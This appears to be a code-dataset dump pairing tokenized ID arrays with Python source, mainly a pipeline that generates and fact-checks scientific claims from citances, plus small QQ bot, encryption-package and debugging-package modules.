685,
64,
329,
257,
287,
2124,
60,
198,
220,
220,
220,
220,
220,
220,
220,
1976,
796,
685,
64,
329,
257,
287,
2124,
60,
198,
220,
220,
220,
220,
220,
220,
220,
331,
13,
30619,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
2068,
62,
30619,
7,
87,
11,
657,
11,
18896,
7,
87,
8,
532,
352,
8,
198,
220,
220,
220,
220,
220,
220,
220,
611,
331,
14512,
2124,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
50,
24707,
4054,
329,
23884,
1911,
18982,
7,
89,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2270,
198,
220,
220,
220,
220,
220,
220,
220,
474,
15853,
352,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
33244,
319,
24415,
23884,
1911,
18982,
7,
73,
532,
352,
4008,
198
] | 1.898148 | 216 |
# -*- coding: utf-8 -*-
from enum import Enum
from qqbot.core.network.ws.ws_event import WsEvent
from qqbot.core.network.ws.ws_handler import DefaultHandler
def register_handlers(handlers):
"""
RegisterHandlers 注册事件回调,并返回 intent 用于 websocket 的鉴权
"""
intent = 0
for handler in handlers:
call_handler = intent_handler_dict.get(handler.type.value)
intent = intent | call_handler(handler.callback, intent)
return intent
intent_handler_dict = {
HandlerType.PLAIN_EVENT_HANDLER.value: plain_event_handler,
HandlerType.GUILD_EVENT_HANDLER.value: guild_event_handler,
HandlerType.GUILD_MEMBER_EVENT_HANDLER.value: guild_member_event_handler,
HandlerType.CHANNEL_EVENT_HANDLER.value: channel_event_handler,
HandlerType.MESSAGE_EVENT_HANDLER.value: message_event_handler,
HandlerType.MESSAGE_DELETE_EVENT_HANDLER.value: delete_message_event_handler,
HandlerType.AT_MESSAGE_EVENT_HANDLER.value: at_message_event_handler,
HandlerType.PUBLIC_MESSAGE_DELETE_EVENT_HANDLER.value: public_message_delete_event_handler,
HandlerType.DIRECT_MESSAGE_EVENT_HANDLER.value: direct_message_event_handler,
HandlerType.DIRECT_MESSAGE_DELETE_EVENT_HANDLER.value: delete_direct_message_event_handler,
HandlerType.AUDIO_EVENT_HANDLER.value: audio_event_handler,
HandlerType.MESSAGE_REACTIONS_EVENT_HANDLER.value: message_reactions_event_handler,
HandlerType.INTERACTION_CREATE_HANDLER.value: interaction_create_event_handler,
}
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
6738,
33829,
1330,
2039,
388,
198,
198,
6738,
10662,
80,
13645,
13,
7295,
13,
27349,
13,
18504,
13,
18504,
62,
15596,
1330,
370,
82,
9237,
198,
6738,
10662,
80,
13645,
13,
7295,
13,
27349,
13,
18504,
13,
18504,
62,
30281,
1330,
15161,
25060,
628,
198,
198,
4299,
7881,
62,
4993,
8116,
7,
4993,
8116,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
17296,
12885,
8116,
10545,
111,
101,
37863,
234,
12859,
233,
20015,
114,
32368,
252,
164,
108,
225,
171,
120,
234,
33176,
114,
32573,
242,
32368,
252,
6824,
13328,
242,
101,
12859,
236,
2639,
5459,
13328,
248,
226,
165,
231,
112,
30266,
225,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
6824,
796,
657,
628,
220,
220,
220,
329,
21360,
287,
32847,
25,
198,
220,
220,
220,
220,
220,
220,
220,
869,
62,
30281,
796,
6824,
62,
30281,
62,
11600,
13,
1136,
7,
30281,
13,
4906,
13,
8367,
8,
198,
220,
220,
220,
220,
220,
220,
220,
6824,
796,
6824,
930,
869,
62,
30281,
7,
30281,
13,
47423,
11,
6824,
8,
628,
220,
220,
220,
1441,
6824,
628,
628,
628,
628,
628,
628,
628,
628,
198,
48536,
62,
30281,
62,
11600,
796,
1391,
198,
220,
220,
220,
32412,
6030,
13,
6489,
29833,
62,
20114,
3525,
62,
39,
6981,
39878,
13,
8367,
25,
8631,
62,
15596,
62,
30281,
11,
198,
220,
220,
220,
32412,
6030,
13,
38022,
26761,
62,
20114,
3525,
62,
39,
6981,
39878,
13,
8367,
25,
19806,
62,
15596,
62,
30281,
11,
198,
220,
220,
220,
32412,
6030,
13,
38022,
26761,
62,
44,
28952,
62,
20114,
3525,
62,
39,
6981,
39878,
13,
8367,
25,
19806,
62,
19522,
62,
15596,
62,
30281,
11,
198,
220,
220,
220,
32412,
6030,
13,
3398,
22846,
3698,
62,
20114,
3525,
62,
39,
6981,
39878,
13,
8367,
25,
6518,
62,
15596,
62,
30281,
11,
198,
220,
220,
220,
32412,
6030,
13,
44,
1546,
4090,
8264,
62,
20114,
3525,
62,
39,
6981,
39878,
13,
8367,
25,
3275,
62,
15596,
62,
30281,
11,
198,
220,
220,
220,
32412,
6030,
13,
44,
1546,
4090,
8264,
62,
7206,
2538,
9328,
62,
20114,
3525,
62,
39,
6981,
39878,
13,
8367,
25,
12233,
62,
20500,
62,
15596,
62,
30281,
11,
198,
220,
220,
220,
32412,
6030,
13,
1404,
62,
44,
1546,
4090,
8264,
62,
20114,
3525,
62,
39,
6981,
39878,
13,
8367,
25,
379,
62,
20500,
62,
15596,
62,
30281,
11,
198,
220,
220,
220,
32412,
6030,
13,
5105,
32936,
62,
44,
1546,
4090,
8264,
62,
7206,
2538,
9328,
62,
20114,
3525,
62,
39,
6981,
39878,
13,
8367,
25,
1171,
62,
20500,
62,
33678,
62,
15596,
62,
30281,
11,
198,
220,
220,
220,
32412,
6030,
13,
17931,
23988,
62,
44,
1546,
4090,
8264,
62,
20114,
3525,
62,
39,
6981,
39878,
13,
8367,
25,
1277,
62,
20500,
62,
15596,
62,
30281,
11,
198,
220,
220,
220,
32412,
6030,
13,
17931,
23988,
62,
44,
1546,
4090,
8264,
62,
7206,
2538,
9328,
62,
20114,
3525,
62,
39,
6981,
39878,
13,
8367,
25,
12233,
62,
12942,
62,
20500,
62,
15596,
62,
30281,
11,
198,
220,
220,
220,
32412,
6030,
13,
48877,
9399,
62,
20114,
3525,
62,
39,
6981,
39878,
13,
8367,
25,
6597,
62,
15596,
62,
30281,
11,
198,
220,
220,
220,
32412,
6030,
13,
44,
1546,
4090,
8264,
62,
2200,
10659,
11053,
62,
20114,
3525,
62,
39,
6981,
39878,
13,
8367,
25,
3275,
62,
260,
4658,
62,
15596,
62,
30281,
11,
198,
220,
220,
220,
32412,
6030,
13,
41358,
44710,
62,
43387,
6158,
62,
39,
6981,
39878,
13,
8367,
25,
10375,
62,
17953,
62,
15596,
62,
30281,
11,
198,
92,
198
] | 2.4967 | 606 |
# SPDX-FileCopyrightText: (c) 2021 Artёm IG <github.com/rtmigo>
# SPDX-License-Identifier: MIT
from ._20_encdec_part import DecryptedIO
from ._30_encdec_multipart import MultipartEncryptor, decrypt_from_dios
| [
2,
30628,
55,
12,
8979,
15269,
8206,
25,
357,
66,
8,
33448,
3683,
141,
239,
76,
35336,
1279,
12567,
13,
785,
14,
17034,
76,
14031,
29,
198,
2,
30628,
55,
12,
34156,
12,
33234,
7483,
25,
17168,
628,
198,
6738,
47540,
1238,
62,
268,
10210,
721,
62,
3911,
1330,
4280,
15109,
9399,
198,
6738,
47540,
1270,
62,
268,
10210,
721,
62,
16680,
541,
433,
1330,
7854,
541,
433,
27195,
6012,
273,
11,
42797,
62,
6738,
62,
67,
4267,
198
] | 2.658228 | 79 |
"""Automatically run post mortem debugging"""
from .mort import main, run
__version__ = "0.9.1"
| [
37811,
38062,
4142,
1057,
1281,
5596,
368,
28769,
37811,
198,
6738,
764,
30171,
1330,
1388,
11,
1057,
198,
198,
834,
9641,
834,
796,
366,
15,
13,
24,
13,
16,
1,
198
] | 3.129032 | 31 |
import argparse
import random
import numpy as np
import torch
import spacy
import scispacy
import json
import os
import pandas as pd
from spacy.training import Example
from tqdm import tqdm
from datasets import Dataset
from functools import partial
from custom_trainer import CustomTrainer
import ipdb
from collections import defaultdict
from scipy.special import softmax
from spacy.util import minibatch, compounding
from generate_claim_variants import kbin
from transformers import pipeline
import transformers
from transformers import (
AutoModelForSeq2SeqLM,
AutoTokenizer,
Seq2SeqTrainingArguments,
HfArgumentParser,
set_seed,
PreTrainedTokenizerBase,
PreTrainedModel,
DataCollatorForSeq2Seq,
AutoModelForCausalLM
)
from ParagraphJointModel.paragraph_model_dynamic import JointParagraphClassifier
from ParagraphJointModel.dataset import SciFactParagraphBatchDataset
from ParagraphJointModel.scifact_joint_paragraph_dynamic_prediction import predict, post_process_stance
from ParagraphJointModel.util import stance2json, rationale2json, merge_json
def qg_data_preprocess(tokenizer, dset, examples):
"""
Data preprocessor for QG model input
:param tokenizer: QG model tokenizer
:param dset: Dataset name, either 'local' for citances or a dataset such as squad
:param examples: The actual data to preprocess
:return: Tokenizer encoded inputs to QG model
"""
if dset == 'local':
inputs = [ctx + ' ' + ans[0]['text'] for ctx, ans in zip(examples['context'], examples['answers'])]
else:
inputs = [ctx + ' ' + ans['text'][0] for ctx, ans in zip(examples['context'], examples['answers'])]
targets = [q for i,q in enumerate(examples['question'])]
model_inputs = tokenizer(inputs, max_length=tokenizer.model_max_length, truncation=True)
# Setup the tokenizer for targets
with tokenizer.as_target_tokenizer():
labels = tokenizer(targets, max_length=tokenizer.model_max_length, truncation=True)
model_inputs["labels"] = labels["input_ids"]
return model_inputs
def q2c_data_preprocess(tokenizer, dset, examples):
"""
Data preprocessor for claim generation model input
:param tokenizer: claim generation model tokenizer
:param dset: Dataset name, either 'citeworth' for citances or a dataset such as squad
:param examples: The actual data to preprocess
:return: Tokenizer encoded inputs to claim generation model
"""
if dset == 'citeworth':
inputs = [ctx + ' ' + ans['text'] for ctx, ans in zip(examples['generated_question'], examples['answer'])]
targets = [''] * len(inputs)
else:
inputs = [q + ' ' + a for q,a in zip(examples['question'], examples['answer'])]
targets = [a for a in examples['turker_answer']]
model_inputs = tokenizer(inputs, max_length=tokenizer.model_max_length, truncation=True)
# Setup the tokenizer for targets
with tokenizer.as_target_tokenizer():
labels = tokenizer(targets, max_length=tokenizer.model_max_length, truncation=True)
model_inputs["labels"] = labels["input_ids"]
return model_inputs
def sort_fc_claims(preds, original_claims):
"""
Scores each claim using the formula:
$$ s = p[support] - p[contradict] $$
Returns the claims sorted by this score in descending order
:param preds: The raw logits from ParagraphJointModel for each evidence sample for each claim
:param original_claims: The original generated claims
:return: Sorted claims with their fact checking score
"""
orig_claim_map = {c['id']: c for c in original_claims}
for p in preds:
all_probs = [softmax(p['evidence'][e]['score']) for e in p['evidence']]
score = max(p[1] - p[2] for p in all_probs)
orig_claim_map[p['id']]['score'] = score
return list(sorted([v for v in orig_claim_map.values()], key=lambda x: x['score'], reverse=True))
def save_ner_model(output_dir, nlp, new_model_name):
"""
Save a spacy model
:param output_dir: Where to save the model
:param nlp: The scispacy model to save
:param new_model_name: New name for the spacy model
:return:
"""
output_dir = f'ner_models/{output_dir}'
if output_dir is not None:
if not os.path.exists(output_dir):
os.makedirs(output_dir)
nlp.meta["name"] = new_model_name
nlp.to_disk(output_dir)
print("Saved model to", output_dir)
def get_named_entities(citances, nlp):
"""
Extract named entities from a set of citances
:param citances:
:param nlp:
:return: List of dicts containing input to question generation model
"""
question_gen_input = defaultdict(list)
for citance_dict in tqdm(citances):
citance = citance_dict['text'] if 'text' in citance_dict else citance_dict['claims']
entities = []
entity_text = []
doc = nlp(citance)
entities.extend(list(doc.ents))
entity_text.extend([e.text for e in doc.ents])
for ent in entities:
answers = [{'text': ent.text, 'type': ent.label_, 'start': ent.start_char, 'pos': [t.pos_ for t in ent]}]
if 'doc_id' in citance_dict:
sample = {'id': citance_dict['doc_id'], 'paper_id': citance_dict['paper_id'],
'context': citance_dict['context'], 'citance': citance, 'answers': answers, 'question': '',
'evidence': citance_dict['evidence']}
else:
sample = {'id': '', 'paper_id': '',
'context': citance_dict['context'], 'citance': citance, 'answers': answers, 'question': '',
'evidence': ''}
for k in sample:
question_gen_input[k].append(sample[k])
return question_gen_input
def run_question_generation(trainer, dset, model, tokenizer, device, num_beams):
"""
Generate a set of questions from a source text and list of answers (named entities)
:param trainer: HuggingFace trainer
:param dset: The dataset to generate questions from
:param model: Question generation model
:param tokenizer: Tokenizer for the provided model
:param device: torch device to run on
:param num_beams: Number of beams for beam search
:return: A list of dicts containing input to the claim generation model
"""
dl = trainer.get_test_dataloader(dset)
all_samples = []
for b in tqdm(dl):
input_ids = b['input_ids'].to(device)
samples = model.generate(
input_ids,
num_beams=num_beams,
max_length=tokenizer.model_max_length,
early_stopping=True
)
all_samples.extend(list(samples.detach().cpu().numpy()))
claim_gen_input = defaultdict(list)
for id, con, ans, q, citance, paper_id, evidence in zip(dset['id'], dset['context'], dset['answers'],
all_samples, dset['citance'], dset['paper_id'],
dset['evidence']):
gen_question = tokenizer.decode(q, skip_special_tokens=True, clean_up_tokenization_spaces=False)
sample = {'id': id, 'paper_id': paper_id, 'context': con, 'answer': ans[0], 'generated_question': gen_question,
'citance': citance, 'evidence': evidence}
for k in sample:
claim_gen_input[k].append(sample[k])
return claim_gen_input
def run_claim_generation(trainer, dset, model, tokenizer, device, num_beams):
"""
Generate a set of claims from a question and list of answers (named entities)
:param trainer: HuggingFace trainer
:param dset: The dataset to generate claims from
:param model: Claim generation model
:param tokenizer: Tokenizer for the provided model
:param device: torch device to run on
:param num_beams: Number of beams for beam search
:return: A list of dicts containing the generated claims and a list of dicts containing the input to external fact
checking model
"""
dl = trainer.get_test_dataloader(dset)
all_samples = []
for b in tqdm(dl):
input_ids = b['input_ids'].to(device)
samples = model.generate(
input_ids,
num_beams=num_beams,
max_length=tokenizer.model_max_length,
early_stopping=True
)
all_samples.extend(list(samples.detach().cpu().numpy()))
generated_claims = []
fc_claim_inputs = []
count = defaultdict(int)
for id, con, ans, q, claim, citance, paper_id, evidence in zip(dset['id'], dset['context'],
dset['answer'], dset['generated_question'],
all_samples, dset['citance'],
dset['paper_id'], dset['evidence']):
gen_claim = tokenizer.decode(claim, skip_special_tokens=True, clean_up_tokenization_spaces=False)
n = count[id]
generated_claims.append(
{'id': f"{id}_{n}", 'paper_id': paper_id, 'context': con, 'citance': citance, 'answer': ans,
'generated_question': q,
'generated_claim': gen_claim, 'evidence': evidence})
fc_claim_inputs.append({'id': f"{id}_{n}", 'claim': gen_claim, 'evidence': {}, 'cited_doc_ids': evidence,
'retrieved_doc_ids': evidence})
count[id] += 1
return generated_claims, fc_claim_inputs
def retrain_ner_model(ner_data, nlp):
"""
Run NER training starting from a given spacy model
:param ner_data: NER training data
:param nlp: Spacy model to start from
:return: Trained spacy model
"""
print(len(ner_data))
random.shuffle(ner_data)
N = int(0.8*len(ner_data))
#Use 20% for validation
ner_training_data = ner_data[:N]
ner_validation_data = ner_data[N:]
pipe_exceptions = ["ner", "trf_wordpiecer", "trf_tok2vec"]
unaffected_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]
best_f = 0.0
patience = 10
pcounter = 0
with nlp.disable_pipes(*unaffected_pipes):
# Training for 100 iterations w/ early stopping
for iteration in range(100):
# shuufling examples before every iteration
random.shuffle(ner_training_data)
losses = {}
# batch up the examples using spaCy's minibatch
batches = minibatch(ner_training_data, size=compounding(4.0, 32.0, 1.001))
for batch in batches:
#texts, annotations = zip(*batch)
nlp.update(
batch, # batch of annotations
drop=0.1, # dropout - make it harder to memorise data
losses=losses,
)
#print("Losses", losses)
# Get validation scores
f1 = nlp.evaluate(ner_validation_data)['ents_f']
print(f"Eval f1: {f1}")
if f1 > best_f:
best_f = f1
save_ner_model("curriculum_learning", nlp, "cl-model")
pcounter = 0
else:
pcounter += 1
if pcounter == patience:
break
return spacy.load("ner_models/curriculum_learning")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--train_citances", help="Location of the citance data", required=True, type=str)
parser.add_argument("--val_citances", help="Location of the validation citance data", required=True, type=str)
parser.add_argument("--test_citances", help="Location of the test citance data", required=True, type=str)
parser.add_argument("--qg_model_name", help="Name of the model to use for question generation", required=True, type=str)
parser.add_argument("--q2c_model_name", help="Name of the model to use for question generation", required=True, type=str)
parser.add_argument("--fc_model_name", help="Name of the fact checking model", required=True,
default='roberta-large')
parser.add_argument("--fc_model_checkpoint", help="Name of the fact checking model", required=False,
default=None)
parser.add_argument("--external_corpus_file", help="Evidence corpus file", required=True,
type=str)
parser.add_argument("--internal_corpus_file", help="Other paragraphs from citance documents", required=True,
type=str)
parser.add_argument("--seed", help="Random seed", type=int, default=1000)
parser.add_argument("--num_beams", help="Number of beams for beam search", type=int, default=1)
parser.add_argument("--output_dir", help="Directory to output files", required=True, type=str)
args = parser.parse_args()
enforce_reproducibility(args.seed)
# See if CUDA available
device = torch.device("cpu")
if torch.cuda.is_available():
print("Training on GPU")
device = torch.device("cuda:0")
# Setup
nlp = spacy.load('en_core_sci_md')
# QG model setup
qg_model = args.qg_model_name
qg_tokenizer = AutoTokenizer.from_pretrained(qg_model)
qg_model = AutoModelForSeq2SeqLM.from_pretrained(qg_model)
# Q2C model setup
q2c_model = args.q2c_model_name
q2c_tokenizer = AutoTokenizer.from_pretrained(q2c_model)
q2c_model = AutoModelForSeq2SeqLM.from_pretrained(q2c_model)
# FC model setup
fc_tokenizer = AutoTokenizer.from_pretrained(args.fc_model_name)
fc_model = JointParagraphClassifier(args.fc_model_name, 1024,
0.0)
state_dict = torch.load(args.fc_model_checkpoint)
# strict = false because of bert.embeddings.position_ids mismatch
fc_model.load_state_dict(state_dict, strict=False)
# Language model for negative claim generation
lm = AutoModelForCausalLM.from_pretrained('gpt2')
lm_tk = AutoTokenizer.from_pretrained('gpt2')
########### Run NER on input
with open(args.train_citances) as f:
citances = [json.loads(l) for l in f]
with open(args.val_citances) as f:
val_citances = [json.loads(l) for l in f]
with open(args.test_citances) as f:
test_citances = [json.loads(l) for l in f]
ner_data = []
output_claims = []
if not os.path.exists(f"{args.output_dir}"):
os.makedirs(f"{args.output_dir}")
save_dir = f"{args.output_dir}"
question_gen_input = get_named_entities(citances, nlp)
val_question_gen_input = get_named_entities(val_citances, nlp)
test_question_gen_input = get_named_entities(test_citances, nlp)
############ Generate questions from NER
qg_model.to(device)
preprocessor = partial(qg_data_preprocess, qg_tokenizer, 'local')
gen_dset_base = Dataset.from_dict(question_gen_input)
val_gen_dset_base = Dataset.from_dict(val_question_gen_input)
test_gen_dset_base = Dataset.from_dict(test_question_gen_input)
# Filter missing NER
#gen_dset_base = gen_dset_base.filter(lambda example: len(example['answers']) > 0)
gen_dset = gen_dset_base.map(preprocessor, batched=True)
val_gen_dset = val_gen_dset_base.map(preprocessor, batched=True)
test_gen_dset = test_gen_dset_base.map(preprocessor, batched=True)
data_collator = DataCollatorForSeq2Seq(
qg_tokenizer,
model=qg_model,
label_pad_token_id=-100,
padding='longest'
)
qg_trainer = CustomTrainer(
model=qg_model,
tokenizer=qg_tokenizer,
data_collator=data_collator
)
claim_gen_input = run_question_generation(qg_trainer, gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
val_claim_gen_input = run_question_generation(qg_trainer, val_gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
test_claim_gen_input = run_question_generation(qg_trainer, test_gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
qg_model.to('cpu')
############ Generate claims from questions
q2c_model.to(device)
preprocessor = partial(q2c_data_preprocess, q2c_tokenizer, 'citeworth')
gen_dset_base = Dataset.from_dict(claim_gen_input)
val_gen_dset_base = Dataset.from_dict(val_claim_gen_input)
test_gen_dset_base = Dataset.from_dict(test_claim_gen_input)
gen_dset = gen_dset_base.map(preprocessor, batched=True)
val_gen_dset = val_gen_dset_base.map(preprocessor, batched=True)
test_gen_dset = test_gen_dset_base.map(preprocessor, batched=True)
data_collator = DataCollatorForSeq2Seq(
q2c_tokenizer,
model=q2c_model,
label_pad_token_id=-100,
padding='longest'
)
q2c_trainer = CustomTrainer(
model=q2c_model,
tokenizer=q2c_tokenizer,
data_collator=data_collator
)
generated_claims, fc_claim_inputs = run_claim_generation(q2c_trainer, gen_dset, q2c_model, q2c_tokenizer, device, args.num_beams)
val_generated_claims, _ = run_claim_generation(q2c_trainer, val_gen_dset, q2c_model, q2c_tokenizer,
device, args.num_beams)
test_generated_claims, _ = run_claim_generation(q2c_trainer, test_gen_dset, q2c_model, q2c_tokenizer, device,
args.num_beams)
with open(f"{save_dir}/output_test_claims.jsonl", 'wt') as f:
for c in test_generated_claims:
f.write(json.dumps(c) + '\n')
with open(f"{save_dir}/output_scifact_dev_claims.jsonl", 'wt') as f:
for c in val_generated_claims:
f.write(json.dumps(c) + '\n')
q2c_model.to('cpu')
# Run FC model
fc_model.to(device)
#TODO get the data into the right format
fc_dev_set = SciFactParagraphBatchDataset(args.external_corpus_file, fc_claim_inputs,
sep_token=fc_tokenizer.sep_token, k=0, train=False)
rationale_predictions, stance_preds, stance_scores = predict(fc_model, fc_dev_set, 16, args.fc_model_name, fc_tokenizer, device)
rationale_json = rationale2json(fc_dev_set.samples, rationale_predictions)
stance_json = stance2json(fc_dev_set.samples, stance_preds, stance_scores)
stance_json = post_process_stance(rationale_json, stance_json)
merged_json = merge_json(rationale_json, stance_json)
fc_model.to('cpu')
# Rank predictions
sorted_fc_claims = sort_fc_claims(merged_json, generated_claims)
# Get new entities
citance_entity_map = defaultdict(lambda: {'text': '', 'entities': []})
original_claims = [c for c in sorted_fc_claims if c['score'] > 0.5]
for c in original_claims:
citance_entity_map[c['id']]['text'] = c['citance']
citance_entity_map[c['id']]['entities'].append(
(c['answer']['start'], c['answer']['start'] + len(c['answer']['text']), 'ENTITY'))
output_claims.extend(original_claims)
citances = [c for c in citances if c['doc_id'] not in citance_entity_map]
output_claims.extend([c for c in sorted_fc_claims if c['score'] <= 0.5])
with open(f"{save_dir}/added_claims.jsonl", 'wt') as f:
for c in output_claims:
f.write(json.dumps(c) + '\n')
csv_out = []
for c in output_claims:
csv_out.append([c['context'], c['citance'], c['generated_claim'], c['score']])
csv_pd = pd.DataFrame(csv_out, columns=['Context', 'Original Sentence', 'Claim', 'Score'])
csv_pd.to_csv(f"{save_dir}/ranked_claims.csv", index=None)
# Generate training data for fact checking
nli = pipeline('sentiment-analysis', model='roberta-large-mnli', return_all_scores=True, device=0)
# Generate data for scifact training/evaluation
for claim_set in tqdm(test_generated_claims):
neg_claims = kbin([claim_set['generated_claim']], nli, lm, lm_tk, device, 3)
claim_set['neg_claim'] = neg_claims[0][2] if neg_claims[0] is not None else None
# Get corpus so we can pick negative samples for NEI
paper_id_to_paragraph = defaultdict(list)
with open(args.internal_corpus_file) as f:
for l in f:
data = json.loads(l)
paper_id = data['doc_id'].split('_')[0]
paper_id_to_paragraph[paper_id].append(data)
# Pick 1/3 to be supports, 1/3 to be contradicts, and 1/3 to be NEI
inc = incgen()
base_claims_and_evidence = []
for claim_set in test_generated_claims:
# Remove ID suffix to get original paper ID
original_doc_id = claim_set['id']
original_doc_id = original_doc_id[:original_doc_id.rfind('_')]
pos_claim = claim_set['generated_claim']
neg_claim = claim_set['neg_claim']
type = random.randint(0, 2)
if type == 0 or neg_claim == None:
base_claims_and_evidence.append({
'id': next(inc),
'claim': pos_claim,
'evidence': {str(doc_id): [{'sentences': [0], 'label': 'SUPPORT'}] for doc_id in
claim_set['evidence']},
'cited_doc_ids': claim_set['evidence']
})
elif type == 1:
base_claims_and_evidence.append({
'id': next(inc),
'claim': neg_claim,
'evidence': {str(doc_id): [{'sentences': [0], 'label': 'CONTRADICT'}] for doc_id in
claim_set['evidence']},
'cited_doc_ids': claim_set['evidence']
})
elif type == 2:
nei_type = random.randint(0, 1)
if nei_type == 0:
base_claims_and_evidence.append({
'id': next(inc),
'claim': pos_claim,
'evidence': {},
'cited_doc_ids': [original_doc_id]
})
else:
base_claims_and_evidence.append({
'id': next(inc),
'claim': neg_claim,
'evidence': {},
'cited_doc_ids': [original_doc_id]
})
with open(f"{save_dir}/scifact_claims.jsonl", 'wt') as f:
for c in base_claims_and_evidence:
f.write(json.dumps(c) + '\n')
| [
11748,
1822,
29572,
198,
11748,
4738,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
28034,
198,
11748,
599,
1590,
198,
11748,
629,
8802,
1590,
198,
11748,
33918,
198,
11748,
28686,
198,
11748,
19798,
292,
355,
279,
67,
198,
198,
6738,
599,
1590,
13,
34409,
1330,
17934,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
198,
6738,
40522,
1330,
16092,
292,
316,
198,
6738,
1257,
310,
10141,
1330,
13027,
198,
6738,
2183,
62,
2213,
10613,
1330,
8562,
2898,
10613,
198,
11748,
20966,
9945,
198,
6738,
17268,
1330,
4277,
11600,
198,
6738,
629,
541,
88,
13,
20887,
1330,
2705,
9806,
198,
6738,
599,
1590,
13,
22602,
1330,
949,
571,
963,
11,
552,
9969,
198,
6738,
7716,
62,
6604,
62,
25641,
1187,
1330,
479,
8800,
198,
6738,
6121,
364,
1330,
11523,
628,
198,
11748,
6121,
364,
198,
6738,
6121,
364,
1330,
357,
198,
220,
220,
220,
11160,
17633,
1890,
4653,
80,
17,
4653,
80,
31288,
11,
198,
220,
220,
220,
11160,
30642,
7509,
11,
198,
220,
220,
220,
1001,
80,
17,
4653,
80,
44357,
28100,
2886,
11,
198,
220,
220,
220,
367,
69,
28100,
1713,
46677,
11,
198,
220,
220,
220,
900,
62,
28826,
11,
198,
220,
220,
220,
3771,
2898,
1328,
30642,
7509,
14881,
11,
198,
220,
220,
220,
3771,
2898,
1328,
17633,
11,
198,
220,
220,
220,
6060,
22667,
1352,
1890,
4653,
80,
17,
4653,
80,
11,
198,
220,
220,
220,
11160,
17633,
1890,
24334,
6775,
31288,
198,
8,
198,
198,
6738,
2547,
6111,
41,
1563,
17633,
13,
20360,
62,
19849,
62,
67,
28995,
1330,
16798,
10044,
6111,
9487,
7483,
198,
6738,
2547,
6111,
41,
1563,
17633,
13,
19608,
292,
316,
1330,
10286,
29054,
10044,
6111,
33,
963,
27354,
292,
316,
198,
6738,
2547,
6111,
41,
1563,
17633,
13,
1416,
29660,
62,
73,
1563,
62,
20360,
62,
67,
28995,
62,
28764,
2867,
1330,
4331,
11,
1281,
62,
14681,
62,
301,
590,
198,
6738,
2547,
6111,
41,
1563,
17633,
13,
22602,
1330,
12046,
17,
17752,
11,
25738,
17,
17752,
11,
20121,
62,
17752,
628,
198,
198,
4299,
10662,
70,
62,
7890,
62,
3866,
14681,
7,
30001,
7509,
11,
288,
2617,
11,
6096,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
6060,
662,
41341,
329,
1195,
38,
2746,
5128,
198,
220,
220,
220,
1058,
17143,
11241,
7509,
25,
1195,
38,
2746,
11241,
7509,
198,
220,
220,
220,
1058,
17143,
288,
2617,
25,
16092,
292,
316,
1438,
11,
2035,
705,
12001,
6,
329,
15433,
1817,
393,
257,
27039,
884,
355,
8244,
198,
220,
220,
220,
1058,
17143,
6096,
25,
383,
4036,
1366,
284,
662,
14681,
198,
220,
220,
220,
1058,
7783,
25,
29130,
7509,
30240,
17311,
284,
1195,
38,
2746,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
611,
288,
2617,
6624,
705,
12001,
10354,
198,
220,
220,
220,
220,
220,
220,
220,
17311,
796,
685,
49464,
1343,
705,
705,
1343,
9093,
58,
15,
7131,
6,
5239,
20520,
329,
269,
17602,
11,
9093,
287,
19974,
7,
1069,
12629,
17816,
22866,
6,
4357,
6096,
17816,
504,
86,
364,
6,
12962,
60,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
17311,
796,
685,
49464,
1343,
705,
705,
1343,
9093,
17816,
5239,
6,
7131,
15,
60,
329,
269,
17602,
11,
9093,
287,
19974,
7,
1069,
12629,
17816,
22866,
6,
4357,
6096,
17816,
504,
86,
364,
6,
12962,
60,
198,
220,
220,
220,
6670,
796,
685,
80,
329,
1312,
11,
80,
287,
27056,
378,
7,
1069,
12629,
17816,
25652,
6,
12962,
60,
198,
220,
220,
220,
2746,
62,
15414,
82,
796,
11241,
7509,
7,
15414,
82,
11,
3509,
62,
13664,
28,
30001,
7509,
13,
19849,
62,
9806,
62,
13664,
11,
40122,
341,
28,
17821,
8,
628,
220,
220,
220,
1303,
31122,
262,
11241,
7509,
329,
6670,
198,
220,
220,
220,
351,
11241,
7509,
13,
292,
62,
16793,
62,
30001,
7509,
33529,
198,
220,
220,
220,
220,
220,
220,
220,
14722,
796,
11241,
7509,
7,
83,
853,
1039,
11,
3509,
62,
13664,
28,
30001,
7509,
13,
19849,
62,
9806,
62,
13664,
11,
40122,
341,
28,
17821,
8,
628,
220,
220,
220,
2746,
62,
15414,
82,
14692,
23912,
1424,
8973,
796,
14722,
14692,
15414,
62,
2340,
8973,
198,
220,
220,
220,
1441,
2746,
62,
15414,
82,
628,
198,
4299,
10662,
17,
66,
62,
7890,
62,
3866,
14681,
7,
30001,
7509,
11,
288,
2617,
11,
6096,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
6060,
662,
41341,
329,
1624,
5270,
2746,
5128,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
11241,
7509,
25,
1624,
5270,
2746,
11241,
7509,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
288,
2617,
25,
16092,
292,
316,
1438,
11,
2035,
705,
47992,
413,
1506,
6,
329,
15433,
1817,
393,
257,
27039,
884,
355,
8244,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
6096,
25,
383,
4036,
1366,
284,
662,
14681,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
29130,
7509,
30240,
17311,
284,
1624,
5270,
2746,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
611,
288,
2617,
6624,
705,
47992,
413,
